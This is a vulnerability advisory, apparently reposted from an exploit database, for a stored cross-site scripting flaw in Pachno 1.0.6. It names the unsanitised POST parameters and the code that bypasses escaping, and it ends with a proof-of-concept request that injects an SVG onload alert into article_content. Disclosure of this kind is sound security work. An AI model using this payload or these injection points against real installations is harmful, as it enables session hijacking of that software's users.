Share
## https://sploitus.com/exploit?id=PACKETSTORM:218854
Pachno 1.0.6 Stored Cross-Site Scripting
    
    
    Vendor: Daniel AndrΓ© Eikeland
    Product web page: https://github.com/pachno/pachno
    Affected version: 1.0.6
    
    Summary: Pachno is an open-source collaboration platform (formerly known as The Bug Genie)
    designed for team project management, issue tracking, and documentation. It offers a module-based,
    customizable environment for software development and team workflows, distributed under the
    Mozilla Public License.
    
    Desc: Input passed to the POST parameters value, comment_body, article_content, description
    and message via multiple controllers is not properly sanitised before being stored in the
    database and returned to the user. The application explicitly bypasses its own htmlspecialchars()
    sanitiser by calling Request::getRawParameter() or Request::getParameter($name, null, false).
    This can be exploited to execute arbitrary HTML and script code in a user's browser session in
    context of an affected site.
    
    Tested on: GNU/Linux
               Apache2
               PHP/7.4
               MySQL/5.7 (MariaDB)
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2026-5980
    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5980
    
    
    06.04.2026
    
    --
    
    
    POST /docs/r/123/edit HTTP/1.1
    Host: 127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Cookie: username=zeroscience; session_token=0123xxx
    
    article_content=<svg onload=alert('251')>